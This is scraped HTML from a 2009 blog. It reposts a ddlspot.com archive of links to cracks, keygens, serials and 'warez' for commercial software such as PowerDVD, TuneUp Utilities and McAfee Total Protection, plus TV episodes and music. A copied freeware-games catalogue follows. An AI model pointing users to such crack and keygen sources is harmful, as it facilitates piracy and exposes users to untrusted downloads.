class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/clonecd-5.3.1.3-download-76264.html" rel="nofollow" title="CloneCD 5.3.1.3" target="_blank">CloneCD 5.3.1.3</a></td><td><a href="http://www.ddlspot.com/clonecd-5.3.1.3-crack-serial-keygen-warez-download.html" title="CloneCD 5.3.1.3 Crack">Crack</a></td><td>App</td><td>2</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/tuneup-utilities-2009-8.0.2000-download-76263.html" rel="nofollow" title="TuneUp Utilities 2009 8.0.2000" target="_blank">TuneUp Utilities 2009 8.0.2000</a></td><td><a href="http://www.ddlspot.com/tuneup-utilities-2009-8.0.2000-crack-serial-keygen-warez-download.html" title="TuneUp Utilities 2009 8.0.2000 Crack">Keygen</a></td><td>App</td><td>33</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/secway-simppro-2.2.16-te-download-76262.html" rel="nofollow" title="Secway SimpPro 2.2.16-TE" target="_blank">Secway SimpPro 2.2.16-TE</a></td><td><a href="http://www.ddlspot.com/secway-simppro-2.2.16-te-crack-serial-keygen-warez-download.html" title="Secway SimpPro 2.2.16-TE Keygen">Keygen</a></td><td>App</td><td>0</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/garmin-gps-maps-unlocker-download-76261.html" rel="nofollow" title="Garmin GPS Maps Unlocker" target="_blank">Garmin GPS Maps Unlocker</a></td><td><a href="http://www.ddlspot.com/garmin-gps-maps-unlocker-crack-serial-keygen-warez-download.html" title="Garmin GPS Maps Unlocker Serial">Serial</a></td><td>App</td><td>17</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/samantha-who-s02e14-download-76260.html" rel="nofollow" title="Samantha Who: S02e14" target="_blank">Samantha Who: S02e14</a></td><td><a href="http://www.ddlspot.com/samantha-who-s02e14-crack-serial-keygen-warez-download.html" title="Samantha Who: S02e14 Serial">Serial</a></td><td>TV</td><td>0</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/burn-notice-s03e04-download-76259.html" rel="nofollow" title="Burn Notice S03e04" target="_blank">Burn Notice S03e04</a></td><td><a href="http://www.ddlspot.com/burn-notice-s03e04-crack-serial-keygen-warez-download.html" title="Burn Notice S03e04 Serial">Crack</a></td><td>TV</td><td>1</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/the-philanthropist-s01e01-download-76258.html" rel="nofollow" title="The Philanthropist S01E01" target="_blank">The Philanthropist S01E01</a></td><td><a href="http://www.ddlspot.com/the-philanthropist-s01e01-crack-serial-keygen-warez-download.html" title="The Philanthropist S01E01 Crack">Crack</a></td><td>TV</td><td>1</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/vlc-media-player-0.9.9-download-76257.html" rel="nofollow" title="VLC Media Player 0.9.9" target="_blank">VLC Media Player 0.9.9</a></td><td><a href="http://www.ddlspot.com/vlc-media-player-0.9.9-crack-serial-keygen-warez-download.html" title="VLC Media Player 0.9.9 Keygen">Keygen</a></td><td>App</td><td>2</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/driver-magician-v3.32-download-76256.html" rel="nofollow" title="Driver Magician V3.32" target="_blank">Driver Magician V3.32</a></td><td><a href="http://www.ddlspot.com/driver-magician-v3.32-crack-serial-keygen-warez-download.html" title="Driver Magician V3.32 Serial">Serial</a></td><td>App</td><td>11</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/eva-mendes-wallpapers-1-download-76255.html" rel="nofollow" title="Eva Mendes: Wallpapers 1" target="_blank">Eva Mendes: Wallpapers 1</a></td><td><a href="http://www.ddlspot.com/eva-mendes-wallpapers-1-crack-serial-keygen-warez-download.html" title="Eva Mendes: Wallpapers 1 Serial">Serial</a></td><td>Other</td><td>6</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/20-house-md-wallpapers-download-76254.html" rel="nofollow" title="20 House MD Wallpapers" target="_blank">20 House MD Wallpapers</a></td><td><a href="http://www.ddlspot.com/20-house-md-wallpapers-crack-serial-keygen-warez-download.html" title="20 House MD Wallpapers Serial">Torrent</a></td><td>Other</td><td>4</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/3d-wallpapers-download-76253.html" rel="nofollow" title="3D Wallpapers" target="_blank">3D Wallpapers</a></td><td><a href="http://www.ddlspot.com/3d-wallpapers-crack-serial-keygen-warez-download.html" title="3D Wallpapers Torrent">Torrent</a></td><td>Other</td><td>16</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/pamela-anderson-wallpapers-1-download-76252.html" rel="nofollow" title="Pamela Anderson: Wallpapers 1" target="_blank">Pamela Anderson: Wallpapers 1</a></td><td><a href="http://www.ddlspot.com/pamela-anderson-wallpapers-1-crack-serial-keygen-warez-download.html" title="Pamela Anderson: Wallpapers 1 Keygen">Keygen</a></td><td>Other</td><td>9</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/jessica-alba-wallpapers-1-download-76251.html" rel="nofollow" title="Jessica Alba: Wallpapers 1" target="_blank">Jessica Alba: Wallpapers 1</a></td><td><a href="http://www.ddlspot.com/jessica-alba-wallpapers-1-crack-serial-keygen-warez-download.html" title="Jessica Alba: Wallpapers 1 Keygen">Serial</a></td><td>Other</td><td>9</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/big-tunes-ignition-download-76250.html" rel="nofollow" title="Big Tunes: Ignition" target="_blank">Big Tunes: Ignition</a></td><td><a href="http://www.ddlspot.com/big-tunes-ignition-crack-serial-keygen-warez-download.html" title="Big Tunes: Ignition Serial">Serial</a></td><td>Music</td><td>4</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/lifehouse-discography-download-76249.html" rel="nofollow" title="Lifehouse: Discography" target="_blank">Lifehouse: Discography</a></td><td><a href="http://www.ddlspot.com/lifehouse-discography-crack-serial-keygen-warez-download.html" title="Lifehouse: Discography Warez">Warez</a></td><td>Music</td><td>3</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/rapid-share-downloader-new-version-download-76248.html" rel="nofollow" title="Rapid Share Downloader New Version" target="_blank">Rapid Share Downloader New Version</a></td><td><a href="http://www.ddlspot.com/rapid-share-downloader-new-version-crack-serial-keygen-warez-download.html" title="Rapid Share Downloader New Version Keygen">Keygen</a></td><td>App</td><td>46</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/cyberlink-powerdvd-ultra-9.0.1719-download-76247.html" rel="nofollow" title="CyberLink PowerDVD Ultra 9.0.1719" target="_blank">CyberLink PowerDVD Ultra 9.0.1719</a></td><td><a href="http://www.ddlspot.com/cyberlink-powerdvd-ultra-9.0.1719-crack-serial-keygen-warez-download.html" title="CyberLink PowerDVD Ultra 9.0.1719 Keygen">Keygen</a></td><td>App</td><td>0</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/microsoft-visual-basic-professional-v6.0-download-76246.html" rel="nofollow" title="Microsoft Visual Basic Professional v6.0" target="_blank">Microsoft Visual Basic Professional v6.0</a></td><td><a href="http://www.ddlspot.com/microsoft-visual-basic-professional-v6.0-crack-serial-keygen-warez-download.html" title="Microsoft Visual Basic Professional v6.0 Keygen">Crack</a></td><td>App</td><td>7</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/usb-disk-security-5.1.0.15-download-76245.html" rel="nofollow" title="USB Disk Security 5.1.0.15" target="_blank">USB Disk Security 5.1.0.15</a></td><td><a href="http://www.ddlspot.com/usb-disk-security-5.1.0.15-crack-serial-keygen-warez-download.html" title="USB Disk Security 5.1.0.15 Crack">Crack</a></td><td>App</td><td>63</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/pctools-file-recover-7.5.0.15-download-76244.html" rel="nofollow" title="PCTools File Recover 7.5.0.15" target="_blank">PCTools File Recover 7.5.0.15</a></td><td><a href="http://www.ddlspot.com/pctools-file-recover-7.5.0.15-crack-serial-keygen-warez-download.html" title="PCTools File Recover 7.5.0.15 Warez">Warez</a></td><td>App</td><td>15</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/ultraiso-professional-9.3.3-build-2685-download-76243.html" rel="nofollow" title="UltraISO Professional 9.3.3 Build 2685" target="_blank">UltraISO Professional 9.3.3 Build 2685</a></td><td><a href="http://www.ddlspot.com/ultraiso-professional-9.3.3-build-2685-crack-serial-keygen-warez-download.html" title="UltraISO Professional 9.3.3 Build 2685 Keygen">Keygen</a></td><td>App</td><td>2</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/trillian-astra-pro-beta-4.0.0.111-download-76242.html" rel="nofollow" title="Trillian Astra Pro Beta 4.0.0.111" target="_blank">Trillian Astra Pro Beta 4.0.0.111</a></td><td><a href="http://www.ddlspot.com/trillian-astra-pro-beta-4.0.0.111-crack-serial-keygen-warez-download.html" title="Trillian Astra Pro Beta 4.0.0.111 Serial">Serial</a></td><td>App</td><td>0</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/mcafee-total-protection-2009-precracked-download-76241.html" rel="nofollow" title="McAfee Total Protection 2009 Precracked" target="_blank">McAfee Total Protection 2009 Precracked</a></td><td><a href="http://www.ddlspot.com/mcafee-total-protection-2009-precracked-crack-serial-keygen-warez-download.html" title="McAfee Total Protection 2009 Precracked Serial">Crack</a></td><td>App</td><td>21</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/selteco-alligator-flash-designer-7.0.7.4-download-76240.html" rel="nofollow" title="Selteco Alligator Flash Designer 7.0.7.4" target="_blank">Selteco Alligator Flash Designer 7.0.7.4</a></td><td><a href="http://www.ddlspot.com/selteco-alligator-flash-designer-7.0.7.4-crack-serial-keygen-warez-download.html" title="Selteco Alligator Flash Designer 7.0.7.4 Crack">Crack</a></td><td>App</td><td>1</td></tr><tr><td class="d" colspan="5"><br /></td></tr> </tbody> </table> </div> <div class="bg"><span class="headings">Download Archive</span> <div align="justify"><span class="content">Page: <a href="http://www.ddlspot.com/archive-1.html">1</a> <a href="http://www.ddlspot.com/archive-2.html">2</a> <strong>[ 3 ]</strong> <a href="http://www.ddlspot.com/archive-4.html">4</a> <a href="http://www.ddlspot.com/archive-5.html">5</a> <a href="http://www.ddlspot.com/archive-6.html">6</a> <a href="http://www.ddlspot.com/archive-7.html">7</a> <a href="http://www.ddlspot.com/archive-8.html">8</a> <a href="http://www.ddlspot.com/archive-9.html">9</a> <a href="http://www.ddlspot.com/archive-10.html">10</a> <a href="http://www.ddlspot.com/archive-11.html">11</a> <a href="http://www.ddlspot.com/archive-12.html">12</a> <a href="http://www.ddlspot.com/archive-13.html">13</a> <a href="http://www.ddlspot.com/archive-14.html">14</a> <a href="http://www.ddlspot.com/archive-15.html">15</a> <a href="http://www.ddlspot.com/archive-16.html">16</a> <a href="http://www.ddlspot.com/archive-17.html">17</a> <a href="http://www.ddlspot.com/archive-18.html">18</a> <a href="http://www.ddlspot.com/archive-19.html">19</a> <a href="http://www.ddlspot.com/archive-20.html">20</a> <a href="http://www.ddlspot.com/archive-21.html">21</a> <a href="http://www.ddlspot.com/archive-22.html">22</a> <a href="http://www.ddlspot.com/archive-23.html">23</a> <a href="http://www.ddlspot.com/archive-24.html">24</a> <a href="http://www.ddlspot.com/archive-25.html">25</a> <a href="http://www.ddlspot.com/archive-26.html">26</a> <a href="http://www.ddlspot.com/archive-27.html">27</a> <a href="http://www.ddlspot.com/archive-28.html">28</a> <a href="http://www.ddlspot.com/archive-29.html">29</a> <a href="http://www.ddlspot.com/archive-30.html">30</a> </span></div></div> <div style='clear: both;'></div> </p> <div class='endline'></div> <p class='commentline'> <a href='https://www.blogger.com/comment.g?blogID=1518176830031402701&postID=5472637097715571210&isPopup=true' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (1)komentar</a> </p> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='post-footer-line post-footer-line-2'> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post-bottom'></div> <div class='endline'></div> <div class='post-top'></div> <div class='post'> <a name='6536150032681312034'></a> <h2> <a href='http://jangkrikvirusdago.blogspot.com/2009/07/free-game-2d.html'>free game 2d</a> </h2> <p class='postmetadata'> Posted in | 15.58 </p> <div class='entry'> <p> <object data="//bin.clearspring.com/at/v/1/button1.6.swf" id="atff" style="width: 1px; height: 1px; position: absolute; z-index: 100000;" type="application/x-shockwave-flash"><param value="transparent" name="wmode"><param value="always" name="allowScriptAccess"></object> <div id="container"> <div id="header"> <ul id="nav-other-cat"><li><a href="http://www.download-free-games.com/games_under_10_dollars/">Games Under $10</a></li><li><a href="http://www.download-free-games.com/mac/">Mac Games</a></li><li><a href="http://www.download-free-games.com/online/">Online Games</a></li><li><a href="http://www.download-free-games.com/download/cat/freeware/">Freeware Games</a></li><li><a href="http://www.download-free-games.com/all/">All Games</a></li></ul> </div><!-- end #header --> <ul id="nav-dl-cat"><li><a href="http://www.download-free-games.com/">Home</a></li><li><a href="http://www.download-free-games.com/download/cat/adventure">Adventure</a></li><li><a href="http://www.download-free-games.com/download/cat/arcade/">Arcade</a></li><li><a href="http://www.download-free-games.com/download/cat/board/">Board</a></li><li><a href="http://www.download-free-games.com/download/cat/cards/">Cards</a></li><li><a href="http://www.download-free-games.com/download/cat/chess/">Chess</a></li><li><a href="http://www.download-free-games.com/download/cat/kids/">Kids</a></li><li><a href="http://www.download-free-games.com/download/cat/pool/">Pool</a></li><li><a href="http://www.download-free-games.com/download/cat/puzzle/">Puzzle</a></li><li><a href="http://www.download-free-games.com/download/cat/racing/">Racing</a></li><li><a href="http://www.download-free-games.com/download/cat/rpg/">RPG</a></li><li><a href="http://www.download-free-games.com/download/cat/simulation/">Simulation</a></li><li><a href="http://www.download-free-games.com/download/cat/war_strategy/">War & Strategy</a></li><li id="lastLink"><a href="http://www.download-free-games.com/download/cat/word/">Word</a></li><li id="cse-search"> <form action="http://www.download-free-games.com/search/" id="cse-search-box"> <div> <input name="cx" value="004077060692380800037:hmjpgccztra" type="hidden"> <input name="cof" value="FORID:11" type="hidden"> <input name="ie" value="UTF-8" type="hidden"> <input class="search_nav" name="q" size="23" type="text"> <input class="search_nav" value="Search" src="http://cdn.dfgfile.com/imgs/btn_search.gif" alt="Search" type="image"> </div> </form> </li></ul> <div id="main-content"> <div id="cat-top-wid"><div id="test-ss"> <!-- START SCANALERT CODE --> <a class="pp-mcafeeSeal" target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.download-free-games.com"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" border="0" height="37" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;" src="http://images.scanalert.com/meter/www.download-free-games.com/31.gif" width="65" /></a> <!-- END SCANALERT CODE --> <div style="float: right; padding-top: 10px; width: 550px;"> <!-- AddThis Button BEGIN --> <div class="addthis_toolbox addthis_default_style" style="margin-left: 15px;"> <p style="margin: 0pt; padding: 0pt; float: left; font-weight: bold;">Add to:</p> <a title="Save to Favorites" class="addthis_button_favorites at300b" style="color: rgb(0, 0, 255); text-decoration: underline;"><span class="at300bs at15t_favorites"></span>Favorites</a> <a title="Send to Facebook" target="_blank" href="http://www.addthis.com/bookmark.php?pub=jamesr7&v=250&source=tbx-250&s=facebook&url=&title=&content=" class="addthis_button_facebook at300b" style="color: rgb(0, 0, 255); text-decoration: underline;"><span class="at300bs at15t_facebook"></span>Facebook</a> <a title="Send to Google" target="_blank" href="http://www.addthis.com/bookmark.php?pub=jamesr7&v=250&source=tbx-250&s=google&url=&title=&content=" class="addthis_button_google at300b" style="color: rgb(0, 0, 255); text-decoration: underline;"><span class="at300bs at15t_google"></span>Google</a> <a title="Send to Live" target="_blank" href="http://www.addthis.com/bookmark.php?pub=jamesr7&v=250&source=tbx-250&s=live&url=&title=&content=" class="addthis_button_live at300b" style="color: rgb(0, 0, 255); text-decoration: underline;"><span class="at300bs at15t_live"></span>Live</a> <a title="Send to Stumbleupon" target="_blank" href="http://www.addthis.com/bookmark.php?pub=jamesr7&v=250&source=tbx-250&s=stumbleupon&url=&title=&content=" class="addthis_button_stumbleupon at300b" style="color: rgb(0, 0, 255); text-decoration: underline;"><span class="at300bs at15t_stumbleupon"></span>StumbleUpon</a> <a title="Tweet This" target="_blank" href="http://www.addthis.com/bookmark.php?pub=jamesr7&v=250&source=tbx-250&s=twitter&url=&title=&content=" class="addthis_button_twitter at300b" style="color: rgb(0, 0, 255); text-decoration: underline;"><span class="at300bs at15t_twitter"></span>Twitter</a> <a href="http://www.addthis.com/bookmark.php?v=250&pub=jamesr7" class="addthis_button_expanded at300m" style="color: rgb(0, 0, 255); text-decoration: underline;"><span class="at300bs at15t_expanded"></span>More</a> </div> <!-- AddThis Button END --> </div> </div></div> <p id="bc-nav"><a href="http://www.download-free-games.com/">Home</a> > <strong>Freeware Games</strong></p> <div id="cat-feat"> <h4><img alt="Freeware Games" class="header-cat-img" src="http://cdn.dfgfile.com/imgs/header_cat_freeware.gif" /> - These freeware games are all full versions, no demos, no time limit restrictions!</h4> <div class="cat-feat-item"> <a class="image-link" href="http://www.download-free-games.com/freeware_games/pacman.htm"><img alt="Pac Man" src="http://cdn.dfgfile.com/imgs/prod/catfeat/pacman_feat.png" /></a> <h3><a href="http://www.download-free-games.com/freeware_games/pacman.htm">Pac Man</a></h3> <p>A nearly exact replica of the arcade classic! </p> </div> <div class="cat-feat-item"> <a class="image-link" href="http://www.download-free-games.com/freeware_games/chicken_invaders.htm"><img alt="Chicken Invaders" src="http://cdn.dfgfile.com/imgs/prod/catfeat/chicken_invaders_feat.png" /></a> <h3><a href="http://www.download-free-games.com/freeware_games/chicken_invaders.htm">Chicken Invaders</a></h3> <p>Save the universe from evil invading chickens!</p> </div> <div class="cat-feat-item"> <a class="image-link" href="http://www.download-free-games.com/freeware_games/icy_tower.htm"><img alt="Icy Tower" src="http://cdn.dfgfile.com/imgs/prod/catfeat/icy_tower_feat.png" /></a> <h3><a href="http://www.download-free-games.com/freeware_games/icy_tower.htm">Icy Tower</a></h3> <p>Jump higher up the tower without letting Harold the Homeboy slip</p> </div> <div class="cat-feat-item"> <a class="image-link" href="http://www.download-free-games.com/freeware_games/star_wars_ms.htm"><img alt="Star Wars" src="http://cdn.dfgfile.com/imgs/prod/catfeat/star_wars_ms_feat.png" /></a> <h3><a href="http://www.download-free-games.com/freeware_games/star_wars_ms.htm">Star Wars</a></h3> <p>Excellent remake of the sit down arcade classic!</p> </div> </div><!-- end #cat-feat --> <div id="cat-index-secondary"> <!-- begin --> <p style="padding-bottom: 10px;"><img align="absmiddle" alt="Freeware Game" height="21" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="21" /> = <a href="javascript:smpopup('http://www.download-free-games.com/download/about-freeware/')">Freeware Game</a> <img align="absmiddle" alt="dfg platinum game" height="14" src="http://cdn.dfgfile.com/imgs/ui/diamond_14x14.gif" width="14" /> = <a href="javascript:platpopup('http://www.download-free-games.com/platinum/summary/')">DFG Platinum Game</a> <span class="new-notice">New!</span> = Games listed in the last 30 days</p> <!-- end --> <h2 class="cat-index-desc">All Freeware Games</h2> <table id="cat-table-nosub" width="900" cellpadding="0" cellspacing="0"> <tbody><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/chicken_invaders.htm">Chicken Invaders</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/chicken_invaders.htm"><img alt="Chicken Invaders" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/chicken_invaders_icon.gif" width="40" /></a></dd><dd>Save the universe from evil invading chickens! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/star_wars_ms.htm">Star Wars</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/star_wars_ms.htm"><img alt="Star Wars" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/star_wars_ms_icon.gif" width="40" /></a></dd><dd>Excellent remake of the sit down arcade classic! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/8kingdoms.htm">8 Kingdoms</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/8kingdoms.htm"><img alt="8 Kingdoms" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/8kingdoms_icon.gif" width="40" /></a></dd><dd>Become the greatest king in the land! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/game_kitty.htm">A Game with a Kitty</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/game_kitty.htm"><img alt="A Game with a Kitty" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/game_kitty_icon.gif" width="40" /></a></dd><dd>Side-scrolling kitty mischief! Explore a mysterious tower. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/two_kingdoms.htm">Two Kingdoms</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/two_kingdoms.htm"><img alt="A Tale of Two Kingdoms" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/two_kingdoms_icon.gif" width="40" /></a></dd><dd>Step into a world of epic fairy tales. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/ahrimans_prophecy.htm">Ahriman's Prophecy</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/ahrimans_prophecy.htm"><img alt="Ahriman’s Prophecy" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/ahrimans_prophecy_icon.gif" width="40" /></a></dd><dd>Fantastic 2D Role Playing Game with over 50 hours of adventure! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/americas_army.htm">America's Army 2.0</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/americas_army.htm"><img alt="America’s Army 2.0" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/americas_army_icon.gif" width="40" /></a></dd><dd>Excellent special forces combat sim. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/pc/bang_howdy.htm">Bang Howdy</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/pc/bang_howdy.htm"><img alt="Bang Howdy" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/bang_howdy_icon.gif" width="40" /></a></dd><dd>Tactical strategy game set in the wild west! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/base_invaders.htm">Base Invaders</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/base_invaders.htm"><img alt="Base Invaders" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/base_invaders_icon.gif" width="40" /></a></dd><dd>A free and frenetic game of tower building and defense! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/baseball_mogul_06.htm">Baseball Mogul 2006</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/baseball_mogul_06.htm"><img alt="Baseball Mogul 2006" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/baseball_mogul_06_icon.gif" width="40" /></a></dd><dd>Run your own major league baseball franchise! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/battle_wesnoth.htm">Battle for Wesnoth</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/battle_wesnoth.htm"><img alt="Battle for Wesnoth" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/battle_wesnoth_icon.gif" width="40" /></a></dd><dd>Build up a great army and regain your throne! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/beats_of_rage.htm">Beats of Rage</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/beats_of_rage.htm"><img alt="Beats of Rage" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/beats_of_rage_icon.gif" width="40" /></a></dd><dd>Fight your way to reestablish justice! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/benjordan_pi.htm">Ben Jordan - PI</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/benjordan_pi.htm"><img alt="Ben Jordan - Paranormal Investigator" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/benjordan_pi_icon.gif" width="40" /></a></dd><dd>An intriguing adventure into the paranormal! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/beneath_a_steel_sky.htm">Beneath a Steel Sky</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/beneath_a_steel_sky.htm"><img alt="Beneath a Steel Sky" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/beneath_a_steel_sky_icon.gif" width="40" /></a></dd><dd>Expose the corruption of a city ruled by LINC. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/bzflag.htm">BZ Flag</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/bzflag.htm"><img alt="BZ Flag" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/bzflag_icon.gif" width="40" /></a></dd><dd>3D tank battle game with futuristic weapons. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/captain_binary.htm">Captain Binary</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a 